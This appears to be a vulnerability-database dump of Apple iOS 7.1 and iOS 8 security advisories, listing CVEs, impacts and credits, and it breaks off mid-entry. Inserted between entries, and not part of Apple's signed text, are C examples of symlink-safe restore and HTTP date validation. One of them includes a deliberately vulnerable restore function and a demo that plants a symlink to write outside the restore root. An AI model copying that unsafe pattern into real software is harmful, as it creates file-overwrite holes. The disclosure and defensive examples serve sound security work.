This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
| VAR-201403-0157 | CVE-2013-5133 | Apple iOS File overwrite vulnerability during restore operation |
CVSS V2: 8.8 CVSS V3: - Severity: HIGH |
Backup in Apple iOS before 7.1 does not properly restrict symlinks, which allows remote attackers to overwrite files during a restore operation via crafted backup data. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attacks, access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
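The Backup fix (CVE-2013-5133) and the Crash Reporting fix (CVE-2014-1272) above come down to one rule: a privileged file operation driven by paths an attacker can influence must never follow a symbolic link. The C program below is an added illustration and is not Apple's backup or CrashHouseKeeping code; the backup_entry structure, restore_entry_safe, restore_entry_unsafe and chmod_nofollow are hypothetical names, and the in-memory backup entries are constructed. It contrasts a restore that recreates a symlink entry and then writes through it with one that rejects symlink entries and opens every path component with O_NOFOLLOW, and applies the same descriptor-based approach to changing permissions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed backup entry (hypothetical, not Apple's format): a file entry carries its contents, a symlink entry its target. */
enum entry_kind { ENTRY_FILE, ENTRY_SYMLINK };
struct backup_entry {
    enum entry_kind kind;
    const char *relpath;   /* relative to the restore root, '/'-separated */
    const char *payload;   /* file contents, or symlink target */
};

/* Open the parent directory of relpath below rootfd with one openat() per component, each with
 * O_NOFOLLOW (creating missing directories), and copy the leaf name into leaf. A symlink anywhere
 * in the path fails with ELOOP and "." / ".." are refused, so the fd can never point outside root. */
static int open_parent_nofollow(int rootfd, const char *relpath, char *leaf, size_t leafsz)
{
    char path[1024];
    if (relpath[0] == '/' || strlen(relpath) >= sizeof path) return -1;
    strcpy(path, relpath);
    char *slash = strrchr(path, '/');
    const char *name = slash ? slash + 1 : path;
    if (!*name || !strcmp(name, ".") || !strcmp(name, "..") || strlen(name) >= leafsz) return -1;
    strcpy(leaf, name);
    if (slash) *slash = '\0';
    int dirfd = dup(rootfd);
    if (dirfd < 0) return -1;
    char *save = NULL;
    for (char *comp = slash ? strtok_r(path, "/", &save) : NULL; comp; comp = strtok_r(NULL, "/", &save)) {
        if (!strcmp(comp, ".") || !strcmp(comp, "..")) { close(dirfd); return -1; }
        int next = openat(dirfd, comp, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
        if (next < 0 && errno == ENOENT && mkdirat(dirfd, comp, 0700) == 0)
            next = openat(dirfd, comp, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
        close(dirfd);
        if (next < 0) return -1;           /* ELOOP: a planted symlink sits in the path */
        dirfd = next;
    }
    return dirfd;
}

static int write_all_close(int fd, const char *data)   /* 0 on a full write, else -1 */
{
    size_t len = strlen(data);
    ssize_t n = write(fd, data, len);
    close(fd);
    return n == (ssize_t)len ? 0 : -1;
}

/* Hardened restore in the spirit of the iOS 7.1 fix: symlink entries are rejected and the leaf is
 * created with O_NOFOLLOW, so no link, from the backup or already on disk, can redirect the write. */
int restore_entry_safe(int rootfd, const struct backup_entry *e)
{
    if (e->kind == ENTRY_SYMLINK) return -1;
    char leaf[256];
    int dirfd = open_parent_nofollow(rootfd, e->relpath, leaf, sizeof leaf);
    if (dirfd < 0) return -1;
    int fd = openat(dirfd, leaf, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW | O_CLOEXEC, 0600);
    close(dirfd);
    return fd < 0 ? -1 : write_all_close(fd, e->payload);
}

/* Pre-fix behaviour, kept for contrast: the symlink entry is recreated, and a later file entry
 * is opened by plain path lookup, which follows that link wherever it points. */
int restore_entry_unsafe(int rootfd, const struct backup_entry *e)
{
    if (e->kind == ENTRY_SYMLINK) return symlinkat(e->payload, rootfd, e->relpath);
    int fd = openat(rootfd, e->relpath, O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0600);
    return fd < 0 ? -1 : write_all_close(fd, e->payload);
}

/* CrashHouseKeeping-style permission fix-up that never follows a symlink: open the object itself
 * with O_NOFOLLOW (a link fails with ELOOP) and fchmod the descriptor, so a link's target is untouched. */
int chmod_nofollow(const char *path, mode_t mode)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    int rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

int main(void)
{
    char root[] = "/tmp/restore.XXXXXX", outside[] = "/tmp/outside.XXXXXX";
    if (!mkdtemp(root) || !mkdtemp(outside)) return 1;
    int rootfd = open(root, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    struct backup_entry planted = { ENTRY_SYMLINK, "Library", outside };   /* attacker's entry */
    struct backup_entry victim  = { ENTRY_FILE, "Library/Cookies.db", "attacker data" };
    restore_entry_unsafe(rootfd, &planted);   /* the old code recreated the link */
    printf("unsafe: %d  safe: %d\n", restore_entry_unsafe(rootfd, &victim), restore_entry_safe(rootfd, &victim));
    close(rootfd);
    return 0;
}
```

Checking each component with its own O_NOFOLLOW openat matters more than an lstat() before the write: an lstat-then-open sequence can be raced by swapping a directory for a link between the two calls, whereas a descriptor obtained with O_NOFOLLOW never follows anything afterwards. The same reasoning is why chmod_nofollow changes the mode on the open descriptor rather than on the path.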
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor user actions in other
apps
Description: An interface in the IOKit framework allowed malicious apps
to monitor user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
| VAR-201403-0199 | CVE-2013-6835 | Apple iOS TelephonyUI Framework vulnerability allowing disclosure of phone number or e-mail address information |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
TelephonyUI Framework in Apple iOS 7 before 7.1, when Safari is used, does not require user confirmation for FaceTime audio calls, which allows remote attackers to obtain telephone number or e-mail address information via a facetime-audio: URL. Apple iOS is affected by a security-bypass vulnerability.
Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks.
These issues affect Apple iOS versions prior to 7.1.
Note: This issue was previously discussed in BID 66087 (Apple iOS APPLE-SA-2014-03-10-1 Multiple Security Vulnerabilities), but has been moved to its own record to better document it. The vulnerability is caused by Safari not asking the user before launching the facetime-audio:// URL.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-1 iOS 8
iOS 8 is now available and addresses the following:
802.1X
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by disabling LEAP by
default.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonné, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Accounts
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to identify the Apple ID
of the user
Description: An issue existed in the access control logic for
accounts. A sandboxed application could get information about the
currently-active iCloud account, including the name of the account.
This issue was addressed by restricting access to certain account
types from unauthorized applications.
CVE-ID
CVE-2014-4423 : Adam Weaver
Certificate Trust Policy
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at
http://support.apple.com/kb/HT5012.
Accessibility
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The device may not lock the screen when using AssistiveTouch
Description: A logic issue existed in AssistiveTouch's handling of
events, which resulted in the screen not locking. This issue was
addressed through improved handling of the lock timer.
CVE-ID
CVE-2014-4368 : Hendrik Bettermann
Accounts Framework
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with access to an iOS device may access
sensitive user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Address Book
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to an iOS device may read the
address book
Description: The address book was encrypted with a key protected
only by the hardware UID. This issue was addressed by encrypting the
address book with a key protected by the hardware UID and the user's
passcode.
CVE-ID
CVE-2014-4352 : Jonathan Zdziarski
App Installation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to escalate privileges and
install unverified applications
Description: A race condition existed in App Installation. An
attacker with the capability of writing to /tmp may have been able to
install an unverified app. This issue was addressed by staging files
for installation in another directory.
CVE-ID
CVE-2014-4386 : evad3rs
App Installation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to escalate privileges and
install unverified applications
Description: A path traversal issue existed in App Installation. A
local attacker could have retargeted code signature validation to a
bundle different from the one being installed and cause installation
of an unverified app. This issue was addressed by detecting and
preventing path traversal when determining which code signature to
verify.
CVE-ID
CVE-2014-4384 : evad3rs
Assets
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to cause an iOS device to think that it is up to date even when it is
not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
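The Assets issue (CVE-2014-4383) is a client-side cache-validation mistake: whatever Last-Modified value the server, or an attacker spoofing it from a privileged network position, returned was echoed back as If-Modified-Since, so one response dated in the future made every later update check come back as not modified. The C code below is an added example, not Apple's update client; parse_http_date, accept_last_modified and build_if_modified_since are hypothetical names, the device clock in main is constructed, and the 5-minute clock-skew allowance is an assumption. It parses the IMF-fixdate form strictly and refuses to carry a future timestamp into the next conditional request.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Days since 1970-01-01 for a proleptic Gregorian date (Howard Hinnant's
 * days_from_civil), so no timegm() or local-timezone handling is needed. */
static long long days_from_civil(long long y, long long m, long long d)
{
    y -= m <= 2;
    long long era = (y >= 0 ? y : y - 399) / 400;
    long long yoe = y - era * 400;
    long long doy = (153 * (m + (m > 2 ? -3 : 9)) + 2) / 5 + d - 1;
    long long doe = yoe * 365 + yoe / 4 - yoe / 100 + doy;
    return era * 146097 + doe - 719468;
}

/* Strict parser for the IMF-fixdate form ("Tue, 15 Nov 1994 08:12:31 GMT"),
 * the only form RFC 7231 lets a sender generate. Obsolete RFC 850 and asctime
 * forms, other zones and trailing bytes are rejected. 0 on success, else -1. */
int parse_http_date(const char *s, long long *out)
{
    static const char months[] = "JanFebMarAprMayJunJulAugSepOctNovDec";
    char wday[4], mon[4], tz[4];
    int d, y, hh, mm, ss, n = 0;
    if (sscanf(s, "%3[A-Za-z], %2d %3[A-Za-z] %4d %2d:%2d:%2d %3[A-Z]%n",
               wday, &d, mon, &y, &hh, &mm, &ss, tz, &n) != 8 || s[n] != '\0')
        return -1;
    if (strcmp(tz, "GMT") != 0 || strlen(mon) != 3) return -1;
    const char *mp = strstr(months, mon);
    if (!mp || (mp - months) % 3 != 0) return -1;
    int m = (int)(mp - months) / 3 + 1;
    if (y < 1970 || d < 1 || d > 31 || hh < 0 || hh > 23 || mm < 0 || mm > 59 || ss < 0 || ss > 60)
        return -1;
    *out = days_from_civil(y, m, d) * 86400 + hh * 3600 + mm * 60 + ss;
    return 0;
}

/* The iOS 8 fix in miniature: a Last-Modified value is only carried forward
 * if it parses and is not in the future relative to the device clock (a skew
 * allowance of 5 minutes is assumed here). Returns the accepted timestamp,
 * or -1 when the header must be ignored for the next update check. */
long long accept_last_modified(const char *header_value, long long now)
{
    long long t;
    if (parse_http_date(header_value, &t) != 0) return -1;
    if (t > now + 300) return -1;
    return t;
}

/* Builds the If-Modified-Since line for the next update request from the
 * last accepted timestamp. Returns 1 on success; 0 (and an empty string) when
 * nothing was accepted, in which case the request is sent unconditionally. */
int build_if_modified_since(long long accepted, char *buf, size_t bufsz)
{
    if (bufsz) buf[0] = '\0';
    if (accepted < 0) return 0;
    time_t t = (time_t)accepted;
    struct tm tm;
    if (!gmtime_r(&t, &tm)) return 0;
    return strftime(buf, bufsz, "If-Modified-Since: %a, %d %b %Y %H:%M:%S GMT", &tm) > 0;
}

int main(void)
{
    long long now = 1410912000LL;   /* constructed device clock: 2014-09-17 00:00:00 UTC */
    char line[64];
    long long good = accept_last_modified("Tue, 15 Nov 1994 08:12:31 GMT", now);
    long long spoofed = accept_last_modified("Sat, 01 Jan 2050 00:00:00 GMT", now);
    build_if_modified_since(good, line, sizeof line);
    printf("genuine: %lld -> \"%s\"\n", good, line);
    build_if_modified_since(spoofed, line, sizeof line);
    printf("spoofed: %lld -> \"%s\" (request goes out unconditional)\n", spoofed, line);
    return 0;
}
```

Dropping a rejected header rather than clamping it to the current time is deliberate: a clamped value would still be an attacker-chosen input to the next request, while an unconditional request simply costs one full download of the update metadata. None of this replaces transport authentication; the header is attacker-controlled precisely because the check was reachable from a privileged network position.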
Bluetooth
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Bluetooth is unexpectedly enabled by default after upgrading
iOS
Description: Bluetooth was enabled automatically after upgrading
iOS. This was addressed by only turning on Bluetooth for major or
minor version updates.
CVE-ID
CVE-2014-4354 : Maneet Singh, Sean Bluestein
CoreGraphics
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
CoreGraphics
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Data Detectors
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Tapping on a FaceTime link in Mail would trigger a FaceTime
audio call without prompting
Description: Mail did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
Foundation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application using NSXMLParser may be misused to disclose
information
Description: An XML External Entity issue existed in NSXMLParser's
handling of XML. This issue was addressed by not loading external
entities across origins.
CVE-ID
CVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)
Home & Lock Screen
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A background app can determine which app is frontmost
Description: The private API for determining the frontmost app did
not have sufficient access control. This issue was addressed through
additional access control.
CVE-ID
CVE-2014-4361 : Andreas Kurtz of NESO Security Labs and Markus
Troßbach of Heilbronn University
iMessage
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Attachments may persist after the parent iMessage or MMS is
deleted
Description: A race condition existed in how attachments were
deleted. This issue was addressed by conducting additional checks on
whether an attachment has been deleted.
CVE-ID
CVE-2014-4353 : Silviu Schiau
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2014-4407 : @PanguTeam
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375 : an anonymous researcher
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Some kernel hardening measures may be bypassed
Description: The random number generator used for kernel hardening
measures early in the boot process was not cryptographically secure.
